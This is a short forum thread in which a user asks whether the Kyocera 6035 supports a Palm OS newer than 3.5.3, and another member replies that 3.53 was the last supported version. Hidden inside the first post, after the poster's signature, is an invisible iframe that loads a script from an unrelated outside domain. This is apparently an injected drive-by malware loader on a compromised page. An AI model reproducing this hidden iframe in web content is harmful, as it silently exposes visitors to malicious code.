+ Reply to Thread
Results 1 to 3 of 3
  1. #1
    Registered User
    Join Date
    10-08-2003
    Posts
    2

    Post Highest supported Palm OS for 6035

    Was just curious if the 6035 supports a Palm OS higher than 3.5.3. And if so, which ones.

    thanks for your time

    Scott<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Converged several times now...
    Join Date
    10-22-2003
    Posts
    111

    3.53 is it...

    The last firmware updates from Kyocera supported 3.53 -- there are no further updates available.

  3. #3
    Registered User
    Join Date
    10-08-2003
    Posts
    2
    Thought so, but just wanted to make sure. I would have called Kyocera, but the entire office was out for the day due to a company meeting.

    Hmm....Company meeting on Friday, Halloween. Wonder if it really was a "meeting"

    Thanks for reply!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts